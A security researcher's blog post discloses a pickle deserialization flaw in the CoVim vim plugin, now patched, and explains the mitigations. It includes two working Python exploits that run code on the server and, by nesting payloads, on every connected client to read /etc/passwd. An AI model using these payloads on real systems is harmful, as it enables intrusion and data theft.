Exploiting CoVim

May 27 2013

Introducing CoVim

CoVim is a vim plugin for collaborative editing of text documents: something like Etherpad-lite, but integrated directly into vim. Sounds cool.

The architecture is simple: a Twisted server can run on any machine, and the vim plugin also runs Twisted code to connect to it. It is the usual client-server architecture, written entirely in Python (you must use a version of vim compiled with Python support).

I think that CoVim has several problems that need to be solved before it reaches a mature state. In this blog post, I focus on one particular issue, which I found by reading the source code a few days after the project was announced.

Pickle fights back

The protocol is quite simple: apart from the first message, which the client sends to announce its nickname, all messages are dictionaries serialised with pickle.

Sure, this adds unnecessary overhead to every message. But most importantly, it is a severe security flaw, one that I had already exploited in an iCTF 2013 challenge.

What does this mean? An attacker can run arbitrary code on either the server or the clients, depending on which end of the connection they control. And as we will see later, it is even possible to exploit all the clients connected to a server simply by connecting to that server as well.
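The root cause fits in a few lines. In the sketch below (Python 3; the Payload class and the harmless "1 + 1" expression are purely illustrative), the pickled bytes name a callable and its arguments through __reduce__, and pickle.loads calls that callable while decoding, before the receiving code ever gets a chance to inspect the result:

```python
import pickle

class Payload:
    """Illustrative class: its __reduce__ tells pickle to call eval("1 + 1")."""
    def __reduce__(self):
        # (callable, args): the unpickler will call callable(*args)
        return (eval, ("1 + 1",))

data = pickle.dumps(Payload())
# The receiver never gets a Payload object back: loads() simply calls eval.
result = pickle.loads(data)
print(result)
```

The CoVim exploits below rely on the same mechanism, with eval and a much longer expression, written by hand in pickle's text format.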

[Screenshot: exploit as seen by a client]

The exploits in this article were tested on commit 2e8006f of CoVim. I reported this security flaw, and my patch was merged into the master branch at commit 2189404.

Exploiting the server

The idea here is simple: since the server directly unpickles the data we send, we just need to craft a specific payload. That said, we probably want to get some result back. Instead of opening a listening socket on the server, or making it connect back to us, why not reuse the TCP connection we already have?

This is not quite that simple, though: since the code uses pickle rather than cPickle, the payload is evaluated inside the pure-Python Unpickler, so self refers to the Unpickler instance (which is why self.find_class is available) rather than to the Protocol subclass, and we cannot directly access its transport.write method. One way around that is to import the gc (garbage collector) module and look for every live object that is an instance of the Protocol class! This is what the string in the prototype variable does.

[Screenshot: exploiting the server]

But then, if we directly send back the information we are looking for (like the content of the /etc/passwd file), all the legitimate clients connected to the server will crash: they receive that payload as well and try to unpickle it. The idea here is to build a legitimate payload (i.e. a pickled dictionary) that carries the information we want under an unused key, so that regular clients simply ignore it.

The rest of the exploit just sends that crafted payload to the server and listens to what comes back. Of course, we don't want to unpickle those messages ourselves, so I used a basic regular expression to look for strings.

import socket
import time
import re

# config: IP address and port of the server
ip, port = '192.168.56.1', 12345

# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
server_exploit = prototype % (
    "__import__('pickle').dumps({'data':{},"\
    "'exploit':''.join(open('/etc/passwd').readlines()).encode('hex')})")

# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going through the messages we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print value.decode('hex')
            break
        key = value
sock.close()
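The regular expression in the script above works only because protocol-0 pickles are line-oriented text in which Python 2 writes str objects as S'...' lines. A sturdier way to read such messages without ever unpickling them is pickletools.genops from the standard library, which walks the opcode stream and yields each opcode with its argument without executing anything. A minimal sketch (Python 3; value_after_key is a hypothetical helper name) reproducing the script's "value that follows the key" logic:

```python
import pickle
import pickletools

# Opcodes whose argument is a string, across pickle protocols.
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",                # Python 2 str
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}

def value_after_key(data, key):
    """Return the string that follows `key` in the pickle, without unpickling it."""
    previous = None
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name not in STRING_OPCODES:
            continue
        if previous == key:
            return arg
        previous = arg
    return None

message = pickle.dumps({"data": {}, "exploit": "726f6f74"}, protocol=0)
print(value_after_key(message, "exploit"))
```

Like the regular expression, this sketch ignores memo references (GET/BINGET opcodes), so a string that appears twice in a message is only seen the first time.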

Exploiting all clients connected to a server

This time, we want to exploit the server so that it sends a crafted payload to all the clients connected to it. The exploited clients then send the result back to the server, which forwards it to the attacker (the server happily broadcasts almost everything it receives, so nothing tricky here).

We are simply going to nest one exploit inside another, like Matryoshka dolls.
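The nesting relies on two tricks visible in the script below: the inner (client) payload is hex-encoded before being embedded in the outer (server) payload, so that its own quote characters cannot terminate the enclosing string literal, and a '####' placeholder is left for the server to fill in with each client's address. A harmless sketch of just that encoding step (Python 3; wrap, unwrap and the inner string are hypothetical):

```python
import binascii

def wrap(inner):
    """Hex-encode an inner payload so that it only contains [0-9a-f]."""
    return binascii.hexlify(inner.encode()).decode()

def unwrap(outer, peer_host):
    """What the middle layer does: decode, then fill in the placeholder."""
    return binascii.unhexlify(outer).decode().replace("####", peer_host)

inner = "{'nick': 'alice', 'ip': '####'}"   # hypothetical inner message
outer = wrap(inner)
print("'" in outer)                          # no quotes left to break a literal
print(unwrap(outer, "203.0.113.7"))
```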

[Screenshot: exploiting all clients]

We would also like to gather the nicknames of all clients, as well as their IP addresses. For the IP address, the best idea is to use the one seen by the server, which avoids collecting the local addresses of hosts behind a NAT.
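In Twisted, the payload reads that address with transport.getPeer().host. At the plain-socket level, the same information is the address returned by accept(), or by getpeername() on the server's side of the connection. A minimal, self-contained sketch over the loopback interface (so there is no actual NAT here; behind one, the server would see the router's public address):

```python
import socket

# Listen on an ephemeral localhost port (port 0 lets the OS choose).
server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)

client = socket.socket()
client.connect(server.getsockname())

conn, addr = server.accept()
# The client's address as seen by the server: the same value that
# getpeername() returns on the accepted socket.
peer_host, peer_port = conn.getpeername()
print(peer_host, addr == (peer_host, peer_port))

for s in (conn, client, server):
    s.close()
```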

Apart from that, since the client code is very similar to the server code, this exploit looks very much like the previous one; there is just an extra layer of encapsulation around the crafted payloads. For the sake of the screenshot above, I limited the data sent to the last eight lines of /etc/passwd.

import socket
import time
import re

# config: IP address and port of the server
ip, port = '192.168.56.1', 12345

# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
client_exploit = prototype % ("__import__('pickle').dumps({'data':{},"\
    "'exploit':('%s#%s#%s'%("\
    # nickname, placeholder, interesting data
    "o.fact.me,'####',''.join(open('/etc/passwd').readlines()[-8:])))."\
    "encode('hex')})")
server_exploit = prototype % ("'%s'.decode('hex').replace('####'," \
    "o.transport.getPeer().host)" \
    % client_exploit.encode('hex'))

# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going through the messages we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print '>' * 40
            print ('\n%s\n' % ('-' * 40)).join(
                    value.decode('hex').split('#'))
            print '<' * 40
        key = value

Conclusion

These exploits target a protocol built entirely on pickle, which means that both the client and the server were vulnerable. I showed that, with some work, one can exploit all the clients connected to a server just by exploiting that server.

Even though my exploits only retrieved the content of the /etc/passwd file, unsafe use of pickle does allow arbitrary code execution. Indeed, the attacker can load any module; for example, my attack used the gc module to get all instances of a particular class. The possibilities are really limitless.
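One existing mitigation is described in the pickle documentation itself (section "Restricting Globals"): subclass pickle.Unpickler and override find_class, the method through which every module and global is loaded. Assuming, as in CoVim, that messages only ever contain dictionaries of strings, a sketch that forbids globals entirely could look like this (Python 3; DataOnlyUnpickler, safe_loads and Payload are hypothetical names):

```python
import io
import pickle

class DataOnlyUnpickler(pickle.Unpickler):
    """Refuse to resolve any global, so only built-in containers and scalars load."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def safe_loads(data):
    return DataOnlyUnpickler(io.BytesIO(data)).load()

class Payload:
    """Illustrative malicious object: unpickling it would call eval."""
    def __reduce__(self):
        return (eval, ("1 + 1",))

print(safe_loads(pickle.dumps({"data": {"line": "hello"}})))
try:
    safe_loads(pickle.dumps(Payload()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

This narrows what an attacker can reach, but it only holds as long as legitimate messages never need a global; a data-only format remains the safer choice.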

To conclude, let me say once more that pickle must not be used to load untrusted data. This is highlighted in the documentation, and it was already the conclusion of a previous article of mine. However, that was probably not enough, as the author of CoVim wrote (emphasis is mine):

We actually were using json instead of pickle initially, but switched because json encoded strings to unicode, while pickle didn't. I didn't know there were security issues involved, i'll look into changing it back.

This means that mentioning it in the documentation is not enough. What can be done to enforce proper use of pickle? Stop automatically calling the callables returned by __reduce__ methods? Rename load and loads to something more explicit, like load_but_insecure_if_not_trusted_input? This is an open question, and any answer is very likely to break compatibility. As a result, we will probably keep finding this vulnerability in new programs for the foreseeable future.
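As for the fix the CoVim author mentioned, going back to JSON is straightforward for a protocol that only exchanges dictionaries of strings; the unicode objection quoted above came from Python 2, where json.loads returns unicode rather than str. A minimal sketch of newline-delimited JSON framing (Python 3; encode_message and decode_message are hypothetical names, not CoVim's code):

```python
import json

def encode_message(message):
    """Serialise one message as a single newline-terminated line of UTF-8 JSON."""
    return (json.dumps(message, separators=(",", ":")) + "\n").encode("utf-8")

def decode_message(line):
    """Parse one line; json.loads only builds dicts, lists, str, numbers, bools and None."""
    return json.loads(line.decode("utf-8"))

wire = encode_message({"data": {"nick": "alice", "line": "hello"}})
print(wire)
print(decode_message(wire))
```

Because json.dumps escapes newlines inside strings, each message fits on one line, and a malicious peer can at worst send malformed JSON, which raises ValueError instead of running code.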